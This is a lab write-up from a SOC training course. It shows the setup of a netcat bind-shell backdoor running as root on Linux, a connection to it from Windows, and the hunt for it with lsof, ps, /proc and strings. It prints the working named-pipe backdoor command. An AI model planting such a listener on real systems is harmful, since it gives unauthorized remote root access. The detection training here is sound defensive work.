This lab is provided by Antisyphon Training's SOC Core Skills course. I will explore the setup and detection of backdoor malware using a netcat listener, a common tool for establishing unauthorized remote access. The exercise aims to simulate a real-world cyber threat scenario, providing hands-on experience in malware analysis and defense techniques. By leveraging the Linux Command Line Interface (CLI), I will detect and analyze the backdoor.
- I first sudo into root so that I can have a backdoor running root.
sudo su -
- This is a simple backdoor mechanism that uses netcat to create a network listener that pipes commands to and from a bash shell, allowing an attacker to remotely execute commands on the system by connecting to port 2222.
mknod backpipe p
/bin/bash 0<backpipe | nc -l 2222 1>backpipe
- IP address of linux system in order to connect
ifconfig
- Now I connect from a Windows system! Once connected, I type some commands to ensure that it is working. As you can see, the Windows computer is connected to the simple Linux backdoor as root. This is the malware. Someone is listening.
ncat 172.17.231.122 2222
- I begin analysis from the Linux CLI. It's time to hunt and find the malware, so I open up a window for analysis.
sudo su -
- Using lsof I can see a listening device and an established connection.
lsof -i -P
- I look at the netcat process ID using the -p option. This will give me all the open files associated with the listed process ID (the netcat listener)
lsof -p 203
- I look at the full processes using the ps command (-a for all, -u to sort by user, -x to include the processes uning a teletype terminal)
ps aux
- The proc directory allows me to see data associated with the various processes directly. I cd into this directory and list the contents
cd /proc/203
ls
- I run strings on the exe in this directory (piping it through less). This can be used to attemp to identify what exactly a program is doing. There is a lot going on, but I keep clicking the space bar, and eventually I see the actual usage information for netcat. Now I know that the malware is netcat.
strings ./exe | less
This lab is crucial for understanding the behavior of backdoor malware and the methodologies used to identify and respond to such threats effectively.